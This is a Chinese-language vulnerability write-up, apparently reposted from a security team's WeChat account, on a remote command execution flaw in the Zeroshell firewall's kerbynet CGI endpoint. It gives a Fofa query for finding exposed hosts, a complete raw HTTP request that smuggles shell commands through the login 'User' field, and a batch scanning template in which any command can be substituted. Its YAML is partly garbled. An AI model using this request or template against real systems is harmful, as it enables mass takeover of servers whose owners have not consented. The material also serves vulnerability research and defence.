漏洞简介
Zeroshell是一个微型的linux发行版本,它功能强大,具有强大的router、radius、web门户、防火墙、virtual、Qos、DHCP、dns转发等功能,可以用来安装到服务器上为内网提供网络服务。Zeroshell防火墙统存在远程命令执行漏洞,攻击者通过漏洞可以获取服务器权限。
漏洞复现
步骤一:使用以下语法进行资产收集...选中目标进行测试...
# Fofa
app="Zeroshell-防火墙"
步骤二:访问其网站使用BP进行抓包改包如下...进行RCE漏洞测试!
POST /cgi-bin/kerbynet HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Thu, 02 Nov 2017 21:35:02 GMT
If-None-Match: "d9da-363-55d06c2be6d80"
Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw
Content-Length: 363
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="Action"
StartSessionSubmit
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="User"
echo bgcafo$() baghqnnz^xyu||a #' &echo 12345948~||a #|" &echo bgcafo$() baghqnnz^xyu||a #
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="PW"
------------YWJkMTQzNDcw--
批量脚本
id: zeroshell-fw-kerbynet-rce
info:
name: zeroshell-fw-kerbynet-rce
author: yy
severity: high
description: Zeroshell是一个微型的linux发行版本,它功能强大,具有强大的router、radius、web门户、防火墙、virtual、Qos、DHCP、dns转发等功能,可以用来安装到服务器上为内网提供网络服务。Zeroshell3.9.0防火墙统存在远程命令执行漏洞,攻击者通过漏洞可以获取服务器权限。
tags: zeroshell,rce
metadata:
tilte=zeroshell :
veified: true
1 :
http:
raw:
|
POST /cgi-bin/kerbynet HTTP/1.1
multipart/form-data; boundary=----------YWJkMTQzNDcw :
378 :
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
gzip,deflate,br :
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE) :
Host:
Connection: Keep-alive
------------YWJkMTQzNDcw
form-data; name="Action" :
StartSessionSubmit
------------YWJkMTQzNDcw
form-data; name="User" :
echo bgcafo$() baghqnnz^xyu||a #' &{{rce}}||a #|" &echo bgcafo$() baghqnnz^xyu||a #
------------YWJkMTQzNDcw
form-data; name="PW" :
------------YWJkMTQzNDcw--
payloads:
rce:
"echo 12345948~"
matchers:
type: dsl
name: rce
dsl:
"status_code_1 == 200 && contains(body,'12345948~') && contains(header,'text/html')"
原文始发于微信公众号(揽月安全团队):ZeroShell kerbynet存在远程命令执行漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论